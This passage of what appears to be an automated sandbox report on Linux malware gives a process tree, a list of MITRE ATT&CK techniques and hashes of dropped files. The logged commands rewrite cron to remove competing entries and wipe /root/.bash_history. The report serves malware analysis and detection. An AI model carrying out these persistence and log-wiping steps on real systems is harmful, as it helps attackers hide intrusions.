/bin/sedsed /185.181.10.234/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/bin/sedsed /update.sh/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /systemd-service.sh/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/bin/sedsed /pg_stat.sh/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed /sleep/d2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/bin/sedsed /oka/d2⤵PID:1825
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/bin/sedsed /linux1213/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/bin/sedsed "/#wget/d"2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed "/#curl/d"2⤵PID:1834
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/bin/sedsed /zsvc/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/bin/sedsed /givemexyz/d2⤵PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1842
-
-
/bin/sedsed /world/d2⤵PID:1845
-
-
/usr/bin/crontabcrontab -l2⤵PID:1844
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1846
-
-
/bin/sedsed /1.sh/d2⤵PID:1848
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1849
-
-
/usr/bin/crontabcrontab -l2⤵PID:1847
-
-
/bin/sedsed /3.sh/d2⤵PID:1851
-
-
/usr/bin/crontabcrontab -l2⤵PID:1850
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1852
-
-
/bin/sedsed /workers/d2⤵PID:1854
-
-
/usr/bin/crontabcrontab -l2⤵PID:1853
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1855
-
-
/usr/bin/crontabcrontab -l2⤵PID:1856
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1858
-
-
/bin/sedsed /oracleservice/d2⤵PID:1857
-
-
/usr/bin/crontabcrontab -l2⤵PID:1859
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1861
-
-
/bin/sedsed /192.81.212.13/d2⤵PID:1860
-
-
/bin/sedsed /base64/d2⤵PID:1863
-
-
/usr/bin/crontabcrontab -l2⤵PID:1862
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1864
-
-
/bin/sedsed /python/d2⤵PID:1866
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1867
-
-
/usr/bin/crontabcrontab -l2⤵PID:1865
-
-
/bin/sedsed /shm/d2⤵PID:1872
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1873
-
-
/usr/bin/crontabcrontab -l2⤵PID:1871
-
-
/bin/sedsed /postgresql/d2⤵PID:1875
-
-
/usr/bin/crontabcrontab -l2⤵PID:1874
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1876
-
-
/bin/sedsed /cloudfronts/d2⤵PID:1878
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1879
-
-
/usr/bin/crontabcrontab -l2⤵PID:1877
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1882
-
-
/usr/bin/crontabcrontab -l2⤵PID:1880
-
-
/bin/sedsed /sshd/d2⤵PID:1881
-
-
/bin/sedsed /linux/d2⤵PID:1884
-
-
/usr/bin/crontabcrontab -l2⤵PID:1883
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1885
-
-
/bin/sedsed /neoogilvy/d2⤵PID:1887
-
-
/usr/bin/crontabcrontab -l2⤵PID:1886
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1888
-
-
/bin/sedsed /rsync/d2⤵PID:1890
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1891
-
-
/usr/bin/crontabcrontab -l2⤵PID:1889
-
-
/bin/sedsed /bpdeliver/d2⤵PID:1893
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1894
-
-
/usr/bin/crontabcrontab -l2⤵PID:1892
-
-
/bin/sedsed /perfcc/d2⤵PID:1896
-
-
/usr/bin/crontabcrontab -l2⤵PID:1895
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1897
-
-
/bin/sedsed /atdb/d2⤵PID:1899
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1900
-
-
/usr/bin/crontabcrontab -l2⤵PID:1898
-
-
/usr/bin/crontabcrontab -l2⤵PID:1901
-
-
/bin/grepgrep -v grep2⤵PID:1903
-
-
/bin/grepgrep -e 185.81.68.1242⤵PID:1902
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1905
-
-
/usr/bin/crontabcrontab -l2⤵PID:1906
-
-
/bin/rmrm -rf /root/.bash_history2⤵PID:1907
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Impair Defenses
1Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.7MB
MD5b3039abf2ad5202f4a9363b418002351
SHA10ceb8ffb0be23b808b534d744440f4367e17b9c5
SHA256787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
SHA5128b1a1003a021d0f69b9295f496bf550932ce85b096ca7057632756348da1354c2b104ff36e901b27def030b79749c8fc7f54163d6195e5e0cb9b357353ee654e
-
Filesize
26KB
MD5ccef46c7edf9131ccffc47bd69eb743b
SHA138c56b5e1489092b80c9908f04379e5a16876f01
SHA256c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
SHA512da452f1022e7ba6e5b958d39d3e5d0418339d55bf8b2ad8cfc9e25a43ad61b6e992df9df97b75d64a22a5b8dde35308f4934d7b0c591bb460526bf24ead808cc
-
Filesize
198B
MD540d800480894888e7b6abd3c91625348
SHA1dc97c4c45b5fa7c51572e47a36bf63f5ba908e08
SHA25690a16951a40101be4cb3e2c55c0a8de710e0e744e7cae003483fa3f825ea67f4
SHA512634f058551676a3d2b8ef126d975da66a8735c089aa4dcec8bd9cc5cd344fde66c445bd9677349fefefc6b7b2e80ad0cb95a585ad5d6f9b7ca7aa6f026ce4857
-
Filesize
820B
MD5084e0f69fb15f10e924f577dd024b906
SHA1fe5a74d3f91a6af65e3370cc1f1f434a3d23e7b9
SHA256d6023d935fe2a6976cd8bc0e416c550a307b4d5433fbe0832c304be1e864e5b8
SHA512cbefecc8a2c75bb6bda2d6446cd777845cdd6a41d066b8f5a5ce776c5fd87749faaa584c0dde862ae32d9a7650826d3368a441bac9fe3894e8540e681d55b794
-
Filesize
1KB
MD538ffec45c7f58da422b3ea1be1d8ba7d
SHA161598ceb0a86bb0970c841a9d7bee61da1160db8
SHA25647c0991ceeea2c316c0663e367c9638fdefd4d28d4f4630eb5a4d4fbcaaca642
SHA5121e870739729b55ca08ac18fd6c80f367882bebd7b8445c90470860e48e1954e0a37671469f27b91f39541cbbab61fecba22606bb101fd7038e7c598356b209ba
-
Filesize
175B
MD5e8f6e7bb23be2ebb749ae1b9d8d30544
SHA10734cb73ded8f039c640dfd848c069e3e5e77b8d
SHA2568f88ba2752ae3cff829f948de91ddb1831cf1f34c5b635d62366361c5100abf5
SHA512c93365c513c79d6783243ef7f518e3339eb906cb94b95f8aac7e994cddc939bb7629c7488902f64c9d97b8bd52cc093dea8ecfe007892ae81f9f4a3547cf6e73
-
Filesize
175B
MD58e747e15b2b105f5415625ea466fcccf
SHA1fdb646724d2ffd0a84ff744b0a005377f712b4ce
SHA256164bf5171751360719d610b7b91019d5d590653377efceabd149b4563b6aaffc
SHA5121fce59cdafba2edfd0737f68fc377217a225aeee321ad5dc89094c63e7071f41193c16c564f559ab80a27e9d77de742026adc6c4ea23e9b18fd013b995e9e966
-
Filesize
175B
MD560dfe4347022a131fe2a4f9c3fdc5396
SHA1af65e4ba1e09c941c35071e13dd62463ae6f1aa4
SHA2560eea35f9570a8659a32116ac64a000d7cd2ee23845610fe6f5b7563f8b0d4cf3
SHA512bb248d9dc3c919fc52863bcbf52de412a3a8d8744818b39c0001281bfbceb1538f74304cec71758090f9ec320a7b6e81a126018c84b27ab3a8ba2c825b8b8d93
-
Filesize
175B
MD5050a98b3b6997e319b77bf76c5f7bc1e
SHA16ef9c7f067a57632abc1614f1ae3b1974e380d3f
SHA256af91d947e1b1d9920b0d97c2186b2c6d8a728c13991d57fc95165dea2211212e
SHA51287b4dd6d2954837b8adfded0e83cc3144aeb8ab25e81f212c9438aadacddfd012bbde5f2555763db5d9737bd31401797300de9329647ca9cad62785faab13971
-
Filesize
175B
MD508c2a0d1c1e20bf564e91bea3d64295e
SHA111a6454cbeff7d8412719ddb177ec9d9d489c416
SHA256fa0be85a50af526eeb284ffc98046f20ece533855f3015bead7f0c6308836a88
SHA51284e8f5d432542995f7c79a2d63f51f8686d7244cbedc6eb521b69f6557103e6b72cec98c3d718f91c01495e4fe15592a5745a42cbf9d061023e501bc90c89bf5
-
Filesize
175B
MD58ec8715a8ec4f2807d87150174e9f410
SHA132707c998f75848656f518a008bf617f318eebe7
SHA25631bb69f609077d4a036c6c6302efb854496e1a546822944065c077d9069e8077
SHA512bb79a031e01c92c7937ae5c4915c71fde88c6f23a2f50faf3aba74039c475950decbfc91da1eb441966ff1dc6fac9357a9189d5673c12ae50d9789d540eaac10
-
Filesize
175B
MD5fce95fc1af55ea2cf068967601615530
SHA1d7ba4dbf2c56c11e1463589f2a1351a981935137
SHA25600555e5a071760a3a4214c0bc671f08741b9883fe7baf48bc7ceaf374b8d23bb
SHA5121de25593e98d1e30ba0920fcfe511e51dc47fdb19bdde5b1ac45f4249f6e4ea98028a79877483942570768d28fee80385cdc80c2a687b402237e19b8864ac17b
-
Filesize
175B
MD52750b3eeeb4a1a298bfb5008e0c281f7
SHA10a4afaf38a9c1d11f1b3fce018b51b72d1961bb2
SHA256825563ce2a4f39bd2002986b22142e184acc6aabc7da9f8752e9d93957ebf211
SHA512149201c40f9229a765879d5cd4ca810ca07a4b97e8b678fe795e9d90e6a003291f02d1e35b6b91c2401e088bb3f1460f8b91c0893f95918a3c13943deede1acc
-
Filesize
175B
MD5a9d501e8fc7e77a18eaf2b236593d720
SHA1b162ddc4f3f7dfab2fbc52703a1ea70209785589
SHA256e0769877825f18f40c77203bd8a4f152b689d0774ffb6ae36b9bf1e0917ebd48
SHA51281905b9cafa382d8f878d88e3d3767a0443192bfb19b4495c78bacd49f6c14c4da99448f8b394b488f491b26ad054d2e3a827fe5eccb0511ea5106e1ed46bb7e
-
Filesize
175B
MD59cd5c5bbf7650ed0fdeeecf6de05b0ac
SHA10937e5e32f41b2347b5ea995bb7f25731104aa60
SHA2565b778117cceb6609f0b4a20e733c5a510cca179fc2a75a27242782204ffd97af
SHA512ab587905569c81c7943c9a98861a792b73e981fea8c0cc596242c8eee705b4ec936bf1abda61623ca647781fd705cb03865be3733c5979cb473ab4f6cda69f06
-
Filesize
175B
MD5218c9b3745f8b123b781e919496692db
SHA1cba0ebf30b0277a2c4a8835756c67d4aff819501
SHA256a5f284bf4d44e3acc342be3551c0cebafe1794654258db3f303a72d0d48febd0
SHA512dc55b76cf6f97d0a346e3068ed11e6c9df9a9b337192d0b00a2b07c1095b5e9d54d0d5983035a5bd3962ab5f1a436283c97bf591c8db16e97e1528ae2eff3c6a
-
Filesize
175B
MD5555c998744881fdfca413f9a9fd6a27a
SHA1d2626c36560b82be992f1a414c221d11d10b76d8
SHA25620765a4318227e05b6cc34e1d7952881f53e75bce461987319ee6b55f51bb749
SHA512957c4eca6c4f28242ba6629549a9e0ca52822cf5823aea5afebfd654c78f1a2a634beb20c47393abad8f0aa37b239429631606718cc231ac106f0f911aa37aeb
-
Filesize
249B
MD552d26f706a370845550cf8327f224966
SHA1db8c48394a03e6b6c51cf6e1ced2f955e39395dd
SHA25601ebc86f322affaac4a20114632c956911d80c1c003a1364839c769956b10074
SHA512dce9a257a80746c95b337a309d1cd2db81aacfdd86cb87af6201c50dcfd1a83f5523773dd65913c4bcf2f7bc4cd8f6c11ab3dcb4c93ac1130e93bdfebd793e58
-
Filesize
175B
MD5c31753ac3da24c9a3115e08fdb39ef7f
SHA1c00f697e070f4934eb5a830642dd3d91f6032f8d
SHA256263bf4b095ce9f3ca831da2caab721d0880efbeb3e8ec3a74e06bfee5d8cd635
SHA512eaba7a0c4dc9fd871b82678b0932e9f7e30079608ee827daec9502c1170cab33438090ae3ea1f8ab41fc4c7d472efd610edcf874d885b455bccd248bfdc64a46
-
Filesize
126B
MD50b510c5a52c0379222d165d2d5f68d9f
SHA1c915fd81d47e26add1c4ff0d13016bf98afd996d
SHA256e249aa6972d9b59fe1c7c20cb6f11a6c0d312868b386c285c8d71d929e3c1db9
SHA512a6584724c684cbb3262deae70cfed27437480632a87aa242bce8e15a14eaa26f4fb8c8b77efb4e834bdf99fb66aceb22cc12eb58f175b933f4c3f40b9953fe4c
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
145B
MD521d20f3caf69e2193c550d8391365601
SHA1a43e594ce780846aa944d348790a76ada70b4e67
SHA256bf4ff934a72f4182e8fa9ff100fc0b12509a618176199da3425bbe204507ddfe
SHA512abc76fefe15ab374ecee539fb015fbdfb147fecc3c2b474168b4e59bcb15151c77c28675e31c3498da8de3122c8f74a4bc0718efd89219a8f5949b89be7b86a0
-
Filesize
912B
MD5a29e27f278b9be8e3f5c2c5ca18d2fd8
SHA14ca5c79bbc11661c0acfb3f9785fde54a9f94109
SHA25609485b576c7363701310bebf3125bda4a7379402db87bceb780ef0ab317695ce
SHA512c57544713f6ffaeb2edaea9a28e689f67e648d4fadd8b3c0507505625eb59496c9da59ef80fd04e17e4d483af1258bc3a43b9c53074991cba8c69d044b2a490c
-
Filesize
288B
MD56b71d39bd55faaf0d903385872578002
SHA105499bf206f77ba0c5019c257413641e57c012b8
SHA2562099fa5a8758687da5d5db4853465d59f0c84ae6c3ece6bee1ab7535a47277e8
SHA512c995479e8a66833d48240301b473b3f04a1a82c03d1e511f7c87c6eb3eb474bd145534b4aa6b150837c1caa9a08dae35b2f3bf4aa4778b6c01316bdf0c9f7276
-
Filesize
89B
MD52e1fe0879641fe5e06095b5ea1824729
SHA14fff23b0f841bddfbc31304d4c50e0848b71be62
SHA25614eb8c89943b37e53026180c48883fe8d4b597f4d543b9a6fd684c7210ee3eb0
SHA51211fe4bc69443566dd0fce2ced4936a95e2be30c5a8bc4dae97bb39acc7bdb05e0de614e9717dcdbc8a90896fd6c0f7de09f361b1ff1f46ba58768338f0fd45c3
-
Filesize
288B
MD5287a08453f9ce5d21d60e18815d77790
SHA1d8329517b15fcb37b0cae875c3c1110889d474d3
SHA256bdad5922b4a08211d9dba036d91f2ef5039666b8d9bc4283f5534477a053c166
SHA512a8285f79680b8327ebc5a84c7c2a0b81e996e44a3ec47a734057288dad99893370358ee9acf1785d7535771ead853dd1ff670b54672c6c0d926b7be0a254d3bb
-
Filesize
89B
MD5daa737d2bea835c33cceb796643c8d81
SHA1856bfd30b72c54ed015155ade7ea00f30ee1940b
SHA256754fd2615a41fd943c3a2727f75988ead3058665474cfce5fba1859a1c45c694
SHA512f713f866e32a5c5835727c34955a80cc7395504eb9e806ea8c372a6102a5ff1fe2b119e1fadb7dccd8ad90962064a6196e8d2705bb3bad3adcea95da939ececc